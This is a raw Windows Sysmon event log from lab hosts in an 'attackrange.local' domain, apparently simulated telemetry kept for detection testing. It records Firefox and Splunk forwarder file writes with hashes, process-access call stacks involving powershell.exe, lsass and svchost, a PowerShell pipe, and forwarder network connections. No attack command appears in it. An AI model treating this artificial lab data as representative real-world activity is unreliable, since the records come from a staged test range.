Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106430Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=10DF08FF9D77ACBF8F2BFB88B4BF1E3E,SHA256=4CC64D82E2EE876BA287302C877554B9D226416AF66CDF9C0350DBB845433881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106429Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.145{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=E1E560A4EAE533286AEA5189E628BBCA,SHA256=0E5F9C474D34A165AF58EFB90E76E2CEDAE8A3E4FC29A6D9B9E2CFAEACD88A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106428Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:23.128{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C980652E2805C82E23C96F2B2F55FD3,SHA256=A68390A84CF6739F2B9C322BA5AEEB848F79A4B2E20E99AC7B90A9D215194AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:24.336{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=694D190BC000E15F8F2E6D8130C15FCF,SHA256=4D202B03AF370EC4DD14E6FDAC0B164F36EBB43AAB4A30D1052916B704CF8AF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:22.414{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51843-false10.0.1.12-8000- 23542300x800000000000000082958Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:24.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C35AAFB5C3683104EE318A65D26006,SHA256=C2BD60BA9CBE8B629CCEEBA337D9DB188000AB01957330472645DC222A812116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.234{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E86069DF35D92C4852E9ED686DE685D5,SHA256=2682AD5488D23442E584C85C51B202CFAF0AEA0A0C87938F9D28462F064BF40D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082959Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:25.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EC2D4BED3AFA7C6E2783D3B5DC85CD6,SHA256=DD9D6ADF681270B04D8D1F8B650C303072824FD8B67E5D32ADEFDDE73223E0C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.078{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 10341000x8000000000000000106478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.078{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.072{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.072{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e5b5e9|C:\Program Files\Mozilla Firefox\xul.dll+e5ca8f|C:\Program Files\Mozilla Firefox\xul.dll+1180086|C:\Program Files\Mozilla Firefox\xul.dll+e5842d|C:\Program Files\Mozilla Firefox\xul.dll+e3fec0|C:\Program Files\Mozilla Firefox\xul.dll+1efaf32|C:\Program Files\Mozilla Firefox\xul.dll+19fbad8|C:\Program Files\Mozilla Firefox\xul.dll+19fdc37|C:\Program Files\Mozilla Firefox\xul.dll+178a7e9|C:\Program Files\Mozilla Firefox\xul.dll+1bc113e|C:\Program Files\Mozilla Firefox\xul.dll+16ce303|C:\Program Files\Mozilla Firefox\xul.dll+1b6874a|C:\Program Files\Mozilla Firefox\xul.dll+178ac8a|C:\Program Files\Mozilla Firefox\xul.dll+1bc113e|C:\Program Files\Mozilla Firefox\xul.dll+16ce303|C:\Program Files\Mozilla Firefox\xul.dll+1b6874a|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+187653b|C:\Program Files\Mozilla Firefox\xul.dll+1a86ce0|C:\Program Files\Mozilla Firefox\xul.dll+1a81c15 10341000x8000000000000000106473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.067{58E9C193-AE68-615A-C800-00000000FC01}45484444C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.047{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:25.047{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:26.239{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62F7F5B2D18C7150B42D13B0F026EDCC,SHA256=120B989780C709B7DC39CF353C3C7C82C1CADF32E14F41B5DF36ABE271E422AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082961Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:24.750{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50132-false10.0.1.12-8000- 23542300x800000000000000082960Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:26.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C7A8A138B632B48E7FD28A3B6C4D34D,SHA256=EBFDBC12986C128A75E082FD45EB5B693F75104DBC4A5D265E4FA9528D13ECF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082962Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:27.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52A43F60E2A9A5CF72EBE1A46DEB12D,SHA256=2B377ABF415C5BDAE4378A1ADFA4C6ACC4B55BE2CF093D159F8D5DFA23557DA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:27.251{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A59A9C65F17A50EB429E4674CBC562B,SHA256=940BDFDF3A5072DEFB7FC51897AAEB84F7924972A31432C6B40B4BA59564A92A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:28.263{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ED82D901A4F5CEAEF2AAF442B659917,SHA256=C68334295B2D097CD30904A4DB1E2AE9517D583D8F701F7E1BA1AB6A66D716E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082963Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:28.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941B15AB8E34E212EDAE0DC3BB8D140A,SHA256=390D8A0E89DC8393F481DF9E2C53EA42F817DC7E063CC6FCE9DCCE0979B5EC64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.977{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.905{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.905{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.877{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.877{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000106584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:59:29.837{58E9C193-B461-615A-2F02-00000000FC01}7796\PSHost.132778079697086523.7796.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000106583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.817{58E9C193-B461-615A-2F02-00000000FC01}7796ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_n0zti11q.5ja.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.817{58E9C193-B461-615A-2F02-00000000FC01}7796ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_drhjzpca.ofg.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000106581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.805{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_drhjzpca.ofg.ps12021-10-04 07:59:29.805 10341000x8000000000000000106580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.782{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.727{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.727{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.727{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B461-615A-3002-00000000FC01}7804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.727{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B461-615A-3002-00000000FC01}7804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:29.722{58E9C193-B461-615A-3002-00000000FC01}78047828C:\Windows\system32\conhost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 